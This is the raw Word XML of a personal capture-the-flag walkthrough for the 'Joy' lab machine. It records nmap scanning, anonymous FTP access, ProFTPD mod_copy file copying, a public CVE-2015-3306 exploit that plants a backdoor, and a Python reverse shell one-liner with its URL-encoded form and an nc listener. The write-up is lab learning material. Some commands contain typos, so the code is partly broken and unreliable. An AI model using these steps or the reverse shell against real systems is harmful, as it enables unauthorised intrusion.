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032F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Trying harder is joy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D48207">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709D3F3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Finding the ip of the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26047A2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>We can use arp-scan --localnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2206C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Netdiscover 192.168.1.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A554D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Nmap 192.168.1.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C6265">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="21183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07E93"/>
    <w:p w14:paraId="1F03235A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Target ip is 192.168.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDFE10C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9E5CF6">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1383665"/>
            <wp:effectExtent l="0" t="0" r="63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D823E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Used -Pn for not pinging that means not using icmp for checking the ports open or closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5EA6B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-A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057CB08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eastAsia="SimSun" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Enables advanced scanning features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE24D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OS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6874A1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Service version detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B371F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Script scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DC6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Traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6ACFC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A90E8EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-sC default script scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785366ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-sV version detection of services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B050366">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-O operating system of the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48C759">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-T4 aggressiveness of timing options T0-T5 the higher the number the quicker results we get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A2BDDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>But we used T4 coz it is reliable and fast at the same time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FB549">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="SimSun" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="SimSun" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>verbose mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="SimSun" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, which provides detailed output about the scanning process, including status updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F8633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-o ooutput the results to a normal file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF487A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>-oN file.txt (normal file)  -oX file.xml (XML format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC82E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0575BD1B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="4549775"/>
            <wp:effectExtent l="0" t="0" r="508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3830A"/>
    <w:p w14:paraId="6595C3C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Now we are gonna go for the ftp login as it has a vulnerability of anonymous login with no password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761095F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ftp 192.168.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37280FBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1B42E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E82B37">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1522095"/>
            <wp:effectExtent l="0" t="0" r="635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2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43F96"/>
    <w:p w14:paraId="3AD46F2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79A05F55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Doing it after 5 hrs so restarted the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B32E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now the ip address is changed 192.168.1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340ABE27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304CBFF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Here we get the access of the ftp login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBA54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Now we are gonna mount the ftp folder upload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB552E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Curlftpfs 192.168.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftpdir/ -ouser=anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35606B6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Using curlftpfs on the target and mounting it in our system in folder ftpdir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9794D">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="763270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1397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93819"/>
    <w:p w14:paraId="684F553B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we have the details of the server on our side saved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43202F84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6F2696">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we have an intresting file version_control here you can see in the below image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEB5AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F652703">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B0FCA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED0DAAF">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="5361305"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175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6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BA17B"/>
    <w:p w14:paraId="035CD63D"/>
    <w:p w14:paraId="469D1F74"/>
    <w:p w14:paraId="149AB064"/>
    <w:p w14:paraId="36166C3A"/>
    <w:p w14:paraId="677E4E81"/>
    <w:p w14:paraId="4A4AD2F7"/>
    <w:p w14:paraId="595666C1"/>
    <w:p w14:paraId="7107150D"/>
    <w:p w14:paraId="1DF2F123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4F2613D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -Pn -sU -A --top-ports=20 -v -oN upd.nmap 192.168.1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AFA10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54693290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3716655"/>
            <wp:effectExtent l="0" t="0" r="6985" b="190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59971">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B48E43B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2277745"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255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36ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E1929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Now we have used tftp which is also used a bigger version of ftp but vulnerable as we can get any file from it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB64C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2613B7D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tfptp 192.168.1.11 36969</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DDEF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get version_control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5328354C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A54E568">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1058545"/>
            <wp:effectExtent l="0" t="0" r="3810" b="825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5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2B322"/>
    <w:p w14:paraId="40E05314">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we have the version control file that seems to have some data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBC3BEE">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2080895"/>
            <wp:effectExtent l="0" t="0" r="6350" b="698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8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9E2D4"/>
    <w:p w14:paraId="234FA45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Instead of getting this file I can do the other work here </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7CB54A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I can just use the telnet service and copy the file from /home/patrick/version_control  in the /home/ftp/upload/version_control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010AEA9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0E6FD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telnet 192.168.1.11 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E224BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Site spfr /home/patrick/version_control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33020D6F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DA7C82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Site cpto /home/ftp/upload/version_control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896BEA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CF4EE6">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2740660"/>
            <wp:effectExtent l="0" t="0" r="3810" b="254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4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73DD4"/>
    <w:p w14:paraId="4A5CC1AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we can see the version control on our desktop and also by just see the p</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>age on the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CCD7A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now we know that the version of ftp is proftpd 1.3.5 and it has a vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176D2DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will use that to exploit the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802BCA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE596C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We have that in metasploit too so can use that one too but mine is not working </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5D5B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63806BE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We will be using the python script or that </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2FF201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"https://github.com/t0kx/exploit-CVE-2015-3306"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https://github.com/t0kx/exploit-CVE-2015-3306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the link for the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70584843">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD7A07C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 exploit.py --host 192.168.1.11 --port 21 --path "/var/www/tryingharderisjoy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732161C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By running this we will be able to get the cmd on the wesite </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599307A9">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="869315"/>
            <wp:effectExtent l="0" t="0" r="1905" b="14605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314D"/>
    <w:p w14:paraId="5FD10C1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Here we just navigated the website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF7683">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E354F9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Our python3 has generated a backdor in the joy machine and given us the cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DDFD46">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="989965"/>
            <wp:effectExtent l="0" t="0" r="8255" b="63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29D79"/>
    <w:p w14:paraId="5CC440E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 pyhton code for shell is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC6C4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python -c ‘import socket,subprocess,os;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59455720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S= socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F4CDA6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connet((“192.168.1.10”,4444 ));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8242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Os.dup2(s.fileno(),0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0202814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Os.dup2(s.file(),1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9725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Os.dup2(s.fileno(),2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621BB7A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P=subprocess.call([“/bash/sh”,”-i”]);’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499295F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D9D47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Used cyber chef to url encode the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BF73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python%20-c%20'import%20socket,subprocess,os;%0As=socket.socket(socket.AF_INET,socket.SOCK_STREAM);%0As.connect((%22192.168.1.10%22,4444));%0Aos.dup2(s.fileno(),0);%0Aos.dup2(s.fileno(),1);%0Aos.dup2(s.fileno(),2);%0Ap=subprocess.call(%5B%22/bin/sh%22,%22-i%22%5D);'%0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F2CB05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3515" cy="421640"/>
            <wp:effectExtent l="0" t="0" r="9525" b="5080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2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BE366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224552A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This code will give us the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADD0D0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So we need to use the nc for listing it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DF45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Nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B758F38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="989965"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635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FDF4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3CA80B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are ready to execute some commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D6C606">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AACDA32">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C722B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First did the ls then I find a folder ossec and get inside it </w:t>
      </w:r>
